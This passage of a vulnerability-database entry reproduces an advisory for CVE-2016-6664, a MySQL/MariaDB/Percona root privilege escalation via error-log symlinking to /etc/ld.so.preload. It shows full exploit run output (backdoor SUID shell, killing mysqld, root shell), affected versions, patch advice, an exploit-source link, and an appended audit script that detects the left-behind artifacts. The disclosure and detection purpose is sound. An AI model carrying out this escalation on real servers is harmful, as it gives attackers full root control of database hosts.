[+] Compiling the privesc shared library (/tmp/privesclib.c)

[+] Backdoor/low-priv shell installed at:
-rwxr-xr-x 1 mysql attacker 1037528 Nov 1 05:08 /tmp/mysqlrootsh

[+] Symlink created at:
lrwxrwxrwx 1 mysql attacker 18 Nov 1 05:08 /var/lib/mysql/xenial-percona.err -> /etc/ld.so.preload

[+] Waiting for MySQL to re-open the logs/MySQL service restart...
Do you want to kill mysqld process to instantly get root? :) ? [y/n] y
Got it. Executing 'killall mysqld' now...

[+] MySQL restarted. The /etc/ld.so.preload file got created with mysql privileges:
-rw-r----- 1 mysql root 19 Nov 1 05:08 /etc/ld.so.preload

[+] Adding /tmp/privesclib.so shared lib to /etc/ld.so.preload

[+] The /etc/ld.so.preload file now contains:
/tmp/privesclib.so

[+] Escalating privileges via the /usr/bin/sudo SUID binary to get root!
-rwsrwxrwx 1 root root 1037528 Nov 1 05:08 /tmp/mysqlrootsh

[+] Rootshell got assigned root SUID perms at:
-rwsrwxrwx 1 root root 1037528 Nov 1 05:08 /tmp/mysqlrootsh

Got root! The database server has been ch-OWNED !

[+] Spawning the rootshell /tmp/mysqlrootsh now!

mysqlrootsh-4.3# whoami
root
mysqlrootsh-4.3# exit
exit

[+] Cleaning up...

[+] Job done. Exiting with code 0
```

Video PoC:
~~~~~~~~~~~~~

http://legalhackers.com/videos/MySQL-MariaDB-PerconaDB-PrivEsc-Race-CVE-2016-6663-5616-6664-5617-Exploits.html

VI. BUSINESS IMPACT
-------------------------

Although the severity of this issue is lower on its own (attackers need to gain access to mysql system user), the vulnerability could easily be combined with the CVE-2016-6663 issue.
The combination of the two would effectively allow low privileged local database users to escalate their system privileges to root system account and allow them to fully compromise the server which increases the severity of this issue.

VII. SYSTEMS AFFECTED
-------------------------

MySQL
  <= 5.5.51
  <= 5.6.32
  <= 5.7.14

MariaDB
  All current

Percona Server
  < 5.5.51-38.2
  < 5.6.32-78-1
  < 5.7.14-8

Percona XtraDB Cluster
  < 5.6.32-25.17
  < 5.7.14-26.17
  < 5.5.41-37.0

VIII. SOLUTION
-------------------------

Vendors have released patches after private disclosure.
Update to the latest version of your DBMS.

IX. REFERENCES
-------------------------

http://legalhackers.com

This advisory:
http://legalhackers.com/advisories/MySQL-Maria-Percona-RootPrivEsc-CVE-2016-6664-5617-Exploit.html

Exploit source code:
http://legalhackers.com/exploits/CVE-2016-6664/mysql-chowned.sh

Related mysql vulnerabilities discovered by the author of this advisory that can be chained with the CVE-2016-6664 vulnerability:

CVE-2016-6663:
http://legalhackers.com/advisories/MySQL-Maria-Percona-PrivEscRace-CVE-2016-6663-5616-Exploit.html

CVE-2016-6662:
http://legalhackers.com/advisories/MySQL-Exploit-Remote-Root-Code-Execution-Privesc-CVE-2016-6662.html

Video PoC:
http://legalhackers.com/videos/MySQL-MariaDB-PerconaDB-PrivEsc-Race-CVE-2016-6663-5616-6664-5617-Exploits.html

CVE-2016-6664
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6664

Oracle CPU:
http://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html#AppendixMSQL

X. CREDITS
-------------------------

The vulnerability has been discovered by Dawid Golunski
dawid (at) legalhackers (dot) com

http://legalhackers.com

XI. REVISION HISTORY
-------------------------

01.11.2016 - Advisory released

XII. LEGAL NOTICES
-------------------------

The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
I accept no responsibility for any damage caused by the use or misuse of this information.

id | SSV:92513 |
last seen | 2017-11-19 |
modified | 2016-11-02 |
published | 2016-11-02 |
reporter | Root |
source | https://www.seebug.org/vuldb/ssvid-92513 |
title | MySQL / MariaDB / PerconaDB elevation of privilege vulnerability (CVE-2016-6664) |
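The example run in the advisory above leaves three artifacts on disk: the error log replaced by a symlink, an /etc/ld.so.preload that is not what root put there, and a SUID file under /tmp. The audit script below checks a host for them. It is an added example, not part of the advisory, and its function names, default paths and the temp-directory list are assumptions.

```shell
#!/bin/sh
# Added example (not from the advisory): audit a host for the on-disk
# artifacts shown in the example run. Names and defaults are assumptions.

# Owner name of a path: GNU stat first, BSD stat as fallback.
owner_of() { stat -c %U "$1" 2>/dev/null || stat -f %Su "$1"; }

# The error log must be a regular file, never a symlink.
log_is_symlink() { [ -L "$1" ]; }

# /etc/ld.so.preload is normally absent. Flag it when it is not owned by
# root or when it loads a library from a world-writable directory.
preload_suspicious() {
    [ -e "$1" ] || return 1
    [ "$(owner_of "$1")" = "root" ] || return 0
    grep -Eq '(^|[[:space:]:])/(tmp|var/tmp|dev/shm)/' "$1"
}

# SUID files have no business living in a temp directory.
suid_in_dir() { find "$1" -xdev -type f -perm -4000 2>/dev/null; }

# Prints alerts on stderr and the number of triggered checks (0-3) on stdout.
audit() {
    errlog=$1; preload=${2:-/etc/ld.so.preload}; tmpdir=${3:-/tmp}; n=0
    if log_is_symlink "$errlog"; then
        echo "ALERT: $errlog is a symlink to $(readlink "$errlog")" >&2
        n=$((n + 1))
    fi
    if preload_suspicious "$preload"; then
        echo "ALERT: $preload has a non-root owner or a temp-dir library" >&2
        n=$((n + 1))
    fi
    suid=$(suid_in_dir "$tmpdir")
    if [ -n "$suid" ]; then
        echo "ALERT: SUID file(s) under $tmpdir:" >&2
        echo "$suid" >&2
        n=$((n + 1))
    fi
    echo "$n"
}

# Usage: ./audit.sh /path/to/mysql-error.log   (path is a placeholder)
if [ $# -gt 0 ]; then audit "$@"; fi
```

Run it as root against the path reported by the server's `log-error` setting; any non-zero count warrants checking the listed files before the next service restart.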
The Hacker News
id | THN:527125445EE758FC7D6A33333D6500EB |
last seen | 2018-01-27 |
modified | 2016-11-06 |
published | 2016-11-02 |
reporter | Swati Khandelwal |
source | https://thehackernews.com/2016/11/mysql-zero-day-exploits.html |
title | Critical Flaws in MySQL Give Hackers Root Access to Server (Exploits Released) |
References
- http://seclists.org/fulldisclosure/2016/Nov/4
- http://packetstormsecurity.com/files/139491/MySQL-MariaDB-PerconaDB-Root-Privilege-Escalation.html
- https://www.percona.com/blog/2016/11/02/percona-responds-to-cve-2016-6663-and-cve-2016-6664/
- http://legalhackers.com/advisories/MySQL-Maria-Percona-RootPrivEsc-CVE-2016-6664-5617-Exploit.html
- https://www.exploit-db.com/exploits/40679/
- http://www.securityfocus.com/bid/93612
- http://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html
- https://security.gentoo.org/glsa/201702-18
- http://www.debian.org/security/2017/dsa-3770
- https://access.redhat.com/errata/RHSA-2017:2192
- http://rhn.redhat.com/errata/RHSA-2016-2749.html
- http://rhn.redhat.com/errata/RHSA-2016-2130.html
- https://access.redhat.com/errata/RHSA-2018:0279
- https://access.redhat.com/errata/RHSA-2018:0574
- http://www.securityfocus.com/archive/1/539695/100/0/threaded